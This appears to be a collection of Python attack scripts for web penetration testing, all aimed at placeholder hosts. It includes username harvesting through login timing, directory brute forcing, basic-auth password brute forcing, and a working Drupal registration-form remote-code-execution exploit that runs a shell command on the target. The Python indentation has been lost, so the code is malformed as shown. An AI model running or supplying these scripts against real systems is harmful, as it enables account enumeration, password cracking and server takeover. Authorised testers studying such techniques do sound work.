#!/usr/bin/python3
import requests
r = requests.post('http://www.test.com/formauth.php', data={'user':'bob','pass':'Password1','button':'Login'})
print (r.text)
HTTPS GET request with invalid cert
#!/usr/bin/python3
import requests
# Set verify=False to avoid errors for self-signed x.509 certificates
r = requests.get('https://www.test.com/',verify=False)
print (r.text)
Timing username harvesting attack
Use case: Testing timing username harvesting attack against Login page, knowing login (1 letter first name, last name) pattern, we go through alphabet + list of last names we got from OSINT against login page. Script will print request roundtrip time + username so we can see if site is vulnerable to attack.
#!/usr/bin/python3
import requests
# asci_lowercase is the string 'abcdefghijklmnopqrstuvwxyz'
from string import ascii_lowercase
with open('user_dictionary.txt') as f:
# Following line reads each line of users_dictionary into python list
# splitlines() removes the newlinses at the end of each line
lines = f.read().splitlines()
# Loop through each name
for lname in lines:
for init in ascii_lowercase:
# Combine letter with last name
username=init+lname
# Requests
r = requests.post('http://www.test.com/securelogin.php', data = {'user':username,'pass':'badpass','button':'Login'})
roundtrip = r.elapsed.total_seconds()
print (str(roundtrip)+": "+username)
# Following command can be run to sort and show longest roundtrip
# ./script.py | sort -n | tail -15
Forced Directory script
Use case: Script runs through aaa through zzz (17,576 requests) and tries to directory brute force. Will return code and url if a 200 or else is found.
#!/usr/bin/python3
import requests
# ascii_lowercase is the string 'abcdefghijklmnopqrstuvwxyz'
from string import ascii_lowercase
url="http://www.test.com/" # Base URL
for one in ascii_lowercase:
for two in ascii_lowercase:
for three in ascii_lowercase:
# this section will run 17,576 times
directory=one+two+three # directory will be 'aaa' through 'zzz'
# Request http://www.test.com/aaa (etc...)
r = requests.get(url+directory)
# if status code is not "Not Found" (404) print url with status code
if r.status_code != 404:
print (url+directory+": "+str(r.status_code))
#!/usr/bin/env python3
import sys
import requests
target = input('Enter target url (example: https://domain.ltd/): ')
# Add proxy support (eg. BURP to analyze HTTP(s) traffic)
# set verify = False if your proxy certificate is self signed
# remember to set proxies both for http and https
#
# example:
# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
# verify = False
proxies = {}
verify = True
url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "EXPLOITED" | tee hello.txt'}
r = requests.post(url, proxies=proxies, data=payload, verify=verify)
check = requests.get(target + 'hello.txt', proxies=proxies, verify=verify)
if check.status_code != 200:
sys.exit("Not exploitable")
print ('\nCheck: '+target+'hello.txt')
Basic Authentication Brute Force
#!/usr/bin/python3
import requests
char="1234567890!@#\$%\^&\*()_+="
user="ford"
url="http://www.test.com/basic/"
with open('/opt/wordlists/splashdata-worst-passwords-2018.txt') as f:
passlist = f.read().splitlines()
for passbase in passlist:
for char1 in char:
for char2 in char:
password = passbase+char1+char2
r = requests.get(url, auth=(user,password))
if r.status_code == 200:
print (str(r.status_code)+": "+user+": "+password)
